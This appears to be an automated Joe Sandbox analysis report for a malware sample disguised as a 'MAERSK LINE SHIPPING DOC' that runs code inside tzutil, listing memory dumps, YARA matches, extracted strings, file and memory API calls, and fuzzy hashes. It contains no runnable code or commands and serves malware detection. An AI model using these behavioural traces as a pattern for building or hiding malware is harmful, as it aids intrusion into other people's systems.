                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                    • API String ID: 0-1984175023
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$O$S$\$s
                                                    • API String ID: 0-3854637164
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: yi
                                                    • API String ID: 0-2336885180
                                                    • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                    • Instruction ID: ae51c03d3e015149392d8002633a368d94bd2f682614255f92e48d029190da6a
                                                    • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                    • Instruction Fuzzy Hash: 2121EDB6D01219AF8B00DFE9D8408EFBBF9EF88210F04456AE919E7240E7715A458FA0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Strings
                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                    • API String ID: 0-1002149817
                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$PP$Qt$V$`J$c6$f$m$o$v>$x$y$}$,$>$_
                                                    • API String ID: 0-4064015928
                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                    • API String ID: 0-392141074
                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                    • API String ID: 0-685823316
                                                    • String ID: .$P$e$i$m$o$r$x
                                                    • API String ID: 0-620024284
                                                    • String ID: 4$XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                    • API String ID: 0-2821098887
                                                    • String ID: .$9$E$\$]$k$v${
                                                    • API String ID: 0-2353787348
                                                    • String ID: L$S$\$a$c$e$l
                                                    • API String ID: 0-3322591375
                                                    • Opcode ID: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                    • Instruction ID: f007d86cdc96ba2a3706748d1893200da6848b512154394482bd1223d92f986c
                                                    • Opcode Fuzzy Hash: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                    • Instruction Fuzzy Hash: 384183B2C00218ABDB10DFA9DC84AEEB7F9BF89304F05469AD919A7140E7715A85CF94
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: F$P$T$f$r$x
                                                    • API String ID: 0-2523166886
                                                    • Opcode ID: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                    • Instruction ID: 3b928b4e3e7ba4c45cffcd4d11c685aa6f355a1497e89c1b2818fcb045fee433
                                                    • Opcode Fuzzy Hash: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                    • Instruction Fuzzy Hash: 3451F371940316ABEB34DFA8CC44BAAF7F8FF49344F00065EA518561C0E7B5A689CFA5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $i$l$o$u
                                                    • API String ID: 0-2051669658
                                                    • Opcode ID: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                    • Instruction ID: 3b192ef28d9f430db9c4eaa7d8c2f1a2d056d5543c94930ce15f4dc507e018ce
                                                    • Opcode Fuzzy Hash: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                    • Instruction Fuzzy Hash: 2D6160B1900304AFDB24DBA4CC80FEFBBFDBB88710F104959E559A7240E775AA45CB65
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-1319493415
                                                    • Opcode ID: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                    • Instruction ID: 69bb09f4fe3a2e5c3ab076b7dc334e913341d16d7182ce5b603904c985578189
                                                    • Opcode Fuzzy Hash: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                    • Instruction Fuzzy Hash: EE416DB19112297AEB01DB91CC41FEFB77DAF8A710F004149F6146A1C1E7746749CBAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                    • API String ID: 0-1319493415
                                                    • Opcode ID: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                    • Instruction ID: 0da8a0e66df4ef3b809ccc43f6d8a8d5281feb56be7385fde493d078a7cddd69
                                                    • Opcode Fuzzy Hash: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                    • Instruction Fuzzy Hash: EF314FB19111297AEB01EB95CC41FEFB77DEF8A710F004049F6146A1C1E7746B458BAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                    • Instruction ID: 4e3fce62224a4a31c8a278f6f60dc861a5fd88988cc60d9eff1bd6f3ce882d4e
                                                    • Opcode Fuzzy Hash: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                    • Instruction Fuzzy Hash: 47B10AB5A00705AFDB24DFA4C885FEFB7BDAF88704F108558E619A7280D775AA41CB50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                    • Instruction ID: 0b20bbc74bc150437515dc44de12284d69ae2889dbf4ef088e58834b90b94477
                                                    • Opcode Fuzzy Hash: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                    • Instruction Fuzzy Hash: 2F8155B2C002696ADB15EB54CD84FEFB37DBF8D300F0045DAA50966180EB746B48CFA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$k$o
                                                    • API String ID: 0-3624523832
                                                    • Opcode ID: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                    • Instruction ID: ba308e9cbb82329d162d95bb5ead6c43304dc51adc16c36f5c70409cf2d93c41
                                                    • Opcode Fuzzy Hash: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                    • Instruction Fuzzy Hash: D9612CB5A00709AFDB64DFA4CC84FEFB7BDAF88704F108558E65997284D731AA41CB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $e$h$o
                                                    • API String ID: 0-3662636641
                                                    • Opcode ID: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                    • Instruction ID: 3372f7b9b25113b00b73a6c5358fd9f1e5ad2accb925192b187b870495c83685
                                                    • Opcode Fuzzy Hash: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                    • Instruction Fuzzy Hash: 3B414471C01369AADB15EBA4CD44FDEB3B9AF4C700F0045DA9509A6181EB746B88CFA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2280000_FeNbdhmZHKN.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$U$g$r
                                                    • API String ID: 0-389700855
                                                    • Opcode ID: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                    • Instruction ID: 26ed47bfd287a02facf6fd2128ec80fe8451a90d605da4a1925e90f3ab487676
                                                    • Opcode Fuzzy Hash: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                    • Instruction Fuzzy Hash: B83134B1910119ABEB04DBA4CD45BEE77F9FF49304F004198E908A72C0FB75AA448BE9

                                                    Execution Graph

                                                    Execution Coverage:2.9%
                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                    Signature Coverage:2.2%
                                                    Total number of Nodes:445
                                                    Total number of Limit Nodes:70

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                    • API String ID: 0-3230942322
                                                    • Opcode ID: 9f584d8322f24883e4d8e3a379d8ce3c0d92b2e1194f65f733dc791a8c8145d3
                                                    • Instruction ID: bfa87a9703eff165ae7ad4b82e8ae15002eb7d1659a33a82338f56df8b7b3a2d
                                                    • Opcode Fuzzy Hash: 9f584d8322f24883e4d8e3a379d8ce3c0d92b2e1194f65f733dc791a8c8145d3
                                                    • Instruction Fuzzy Hash: BD32ACB0E05268CFEB24CF44C894BDDBBB1BB45308F5085D9D04A7B291C7B96A89CF56
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0097CAB1
                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0097CAEE
                                                    • FindClose.KERNELBASE(?), ref: 0097CAF9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                    • Instruction ID: 3ca151f1e667a7f13e10544ce6e1f51ab7991ed4951adabce040d613b0d6f265
                                                    • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                    • Instruction Fuzzy Hash: 1F3188B29003087BDB24EF64CC85FEF77BC9F84745F14455CB909A7281DAB0AA85CBA1
                                                    APIs
                                                    • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 0098957B
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                    • Instruction ID: 8b7968a2d95dfdd5f1ea78f56d10a138d2013afbb7cb0022a56485453698b1e9
                                                    • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                    • Instruction Fuzzy Hash: 8031D0B5A05248AFDB54DF98D881EEFB7F9EF88304F108219F908A7340D734A951CBA5
                                                    APIs
                                                    • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 009896D6
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                    • Instruction ID: 6df24ae926f2c2f7036e0d6059f04e29ec139040ac01af8a794790b768ef1c20
                                                    • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                    • Instruction Fuzzy Hash: 0531E4B5A00208AFDB14DF98D881EEFB7F9EF88714F148209F958A7340D734A911CBA5
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(009721AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,009882FF,009721AE), ref: 009899A8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                    • Instruction ID: ff85212ff40a3685cdd61a44f61b40399342fb6ea645470c88b15ab74259560b
                                                    • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                    • Instruction Fuzzy Hash: B32119B5A00249ABDB10EF98DC41FEFB7B9EF89700F104109F949AB341D775A9118BA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                    • Instruction ID: eea6ed950fedaf0cb574ffd644832cedcc719f63981c7abc22b44ddf451bfeb3
                                                    • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                    • Instruction Fuzzy Hash: C11170716013087BD660EA64DC42FABB3ACDFC5714F104149F94CAB241DB7579058BA6
                                                    APIs
                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009897B1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_960000_tzutil.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction ID: 865a36bf4dd1f84314f1d41416385cacd5c197a2eb0e5e88074021ec9d63a666
                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                    • Instruction Fuzzy Hash: F2E08C36201604BBE220FA59DC01F9BB76DEFC6720F008015FA48A7241C672B9148BF1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                    • Instruction ID: 72c92bbcb24c92b6a2295692ef5c4e4972709a11658c111f7618beda93aab60a
                                                    • Opcode Fuzzy Hash: 999881ee96d21e81fef1215127109708f4520cbe74ac6073b0c152aa10bc69b4
                                                    • Instruction Fuzzy Hash: 4D900231605804129140B25848C458A4006D7F0301B95C012E0424958C8B148A565365
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                    • Instruction ID: dfe9b4d20b83632294945e48237db2af787c42e5f342c93c6f8b94d8409d2823
                                                    • Opcode Fuzzy Hash: 5e93a703c7f5f54fc9e144388878dbb1c25cbcaf6e3f42b7074de15c1c7a85be
                                                    • Instruction Fuzzy Hash: DF90026120180803D140B658484464B0006C7E0302F95C012A2064959E8B298D516139
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                    • Instruction ID: 5b2508f1a83d2d699049f6d0716aa297cdb4ef6126c4b29bee7b16b2be661737
                                                    • Opcode Fuzzy Hash: 5ad20d37507022d2f2273f13ea7a713b5c9947c9313c6518467cc18144a7028d
                                                    • Instruction Fuzzy Hash: C390022160140902D101B258444465A000BC7E0341FD5C023A1024959ECB258A92A135
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                    • Instruction ID: ffc033f7e1f6c6890b4aac20874f2776d581f4be96ba09313c4e47e33bd37ac5
                                                    • Opcode Fuzzy Hash: a54b2899dfc8ca35ca12bdcca9794f85d5d64e0c25401c02d4e9d8d88d6ee4f3
                                                    • Instruction Fuzzy Hash: D790022921340402D180B258544864E0006C7E1302FD5D416A001595CCCB1589695325
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                    • Instruction ID: 3e068da38f2575aa266daf77abc10c18cfa6c1e4e4eb60675e31b78fc05b6fb4
                                                    • Opcode Fuzzy Hash: f2c96e209ac0d30abacb3cdfe97c92a9a03af4fdca27059db6f32e8a6a1893c8
                                                    • Instruction Fuzzy Hash: E690022130140403D140B258545864A4006D7F1301F95D012E0414958CDB1589565226
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                    • Instruction ID: 59f5aeeb119ec5e2b9127aed687eddae7065d09bc08c4bfc827971450e953640
                                                    • Opcode Fuzzy Hash: 9c92a54f9a4b905a300c94c250f8182f472e4bfe2beb934851d46e0a235b45dd
                                                    • Instruction Fuzzy Hash: 60900221242445525545F258444454B4007D7F03417D5C013A1414D54C87269956D625
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                    • Instruction ID: a81098e5722d36f428ef954467ae2455a47630f9ac59229d58944769b4d7c5f7
                                                    • Opcode Fuzzy Hash: 46977b51b773d13d9b7de835fdf2022ba2715e9f56745a477666e3357d74669c
                                                    • Instruction Fuzzy Hash: A890023120140813D111B258454474B000AC7E0341FD5C413A042495CD97568A52A125
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2538262690.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                    • Associated: 00000006.00000002.2538262690.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000006.00000002.2538262690.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3400000_tzutil.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
                                                    • Instruction ID: bac37f058a9e44e3df3b834c4ea919e15cc8c498e56e899edf1770c556259564
                                                    • Opcode Fuzzy Hash: c1515ba76762767aee053f2ff061a1d560423c64ed3c9c577a0706a4e807a2e5
